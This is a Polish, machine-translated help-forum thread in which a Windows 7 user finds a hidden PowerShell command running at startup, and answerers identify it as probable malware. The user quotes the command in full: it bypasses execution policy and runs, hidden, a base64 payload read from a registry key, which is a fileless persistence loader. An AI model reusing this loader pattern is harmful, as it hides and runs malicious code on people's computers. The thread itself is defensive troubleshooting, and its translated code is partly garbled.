Skrypt wyskakuje podczas uruchamiania?

0

Ponownie uruchomiłem cały system dwa dni temu i po zainstalowaniu całego potrzebnego oprogramowania zdałem sobie sprawę, że za każdym razem, gdy włączam komputer, coś działa na pasku startowym. Szybko sprawdziłem, co to jest, zanim zniknęło i był to Windows PowerShell.

Czy ktoś może mi wyjaśnić, dlaczego działa on po włączeniu komputera, czy mogę / powinienem spróbować go zatrzymać i czy może powodować problemy?

windows-7 powershell użytkownik566035
źródło
4
Użyj Autoruns, aby określić nazwę pliku skryptu. Być może zaczyna się proces, który go uruchamia, więc będziesz musiał go rozgryźć, można to rozgryźć, po prostu zajmie ci to sporo wysiłku.
Ramhound
1
Brzmi dla mnie jak złośliwe oprogramowanie
Moab
Wygląda na związane z security.stackexchange.com/questions/100020/…
David d C e Freitas

Odpowiedzi:

-1

Sprawdź folder startowy (w systemie Windows 7: start> wszystkie programy> uruchomienie). Sprawdź także kartę startową msconfig, aby zobaczyć, co tam jest. (Klawisz Windows + R dla okna Uruchom, wpisz msconfig)

edthepenguin
źródło
Z jakiegoś powodu folder startowy jest pusty, aw msconfig napisano, że producentem jest Microsoft, a polecenie jest po prostu ogromne, napiszę go tutaj. C: /Windows/system32/WindowsPowerShell/v1.0/powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text Encoding] :: ASCII.GetString ([Convert] :: FromBase64String ((gp'HKCU: / Software /Classes/EoIVcf').JNJJREXKMCTP)))); Czy powinienem zatrzymać ten proces w msconfig w części startowej i czy zmieni to coś drastycznie?
user566035
Możesz tymczasowo wyłączyć to w msconfig, aby sprawdzić, czy wpływa na inny proces, nie wpłynie to na uruchamianie systemu Windows. Nie jestem pewien, na co wskazuje klucz rejestru, może ktoś inny może tam pomóc.
edthepenguin
Wyłączyłem go w msconfig i ponownie uruchomiłem komputer i nic dziwnego się nie wydarzyło, myślę, że nie jest podłączony do żadnego ważnego oprogramowania. Kiedy instalowałem Daemon Tools i WinRar, widziałem opcję dotyczącą instalacji powłoki. Czy to możliwe?
user566035,
2
Dla mnie wygląda na złośliwe oprogramowanie. Jest zakodowany w standardzie base64, aby ukryć uruchomiony kod. Polecenie oznacza: uruchom zawartość wpisu rejestru JNJJREXKMCTP pod kluczem HKCU: \ Software \ Classe‌ s \ EoIVcf. Możesz go samodzielnie zdekodować, otwierając PowerShell i wklejając go [Text Encoding]::ASCII.GetString([Convert]::FromBase64String((gp'HKCU:\Software\Classe‌​s\EoIVcf').JNJJREXKMCTP))). To prawdopodobnie jakiś dropper, który pobiera i instaluje złośliwe oprogramowanie na twoim komputerze. Skanuj komputer w poszukiwaniu infekcji.
megamorf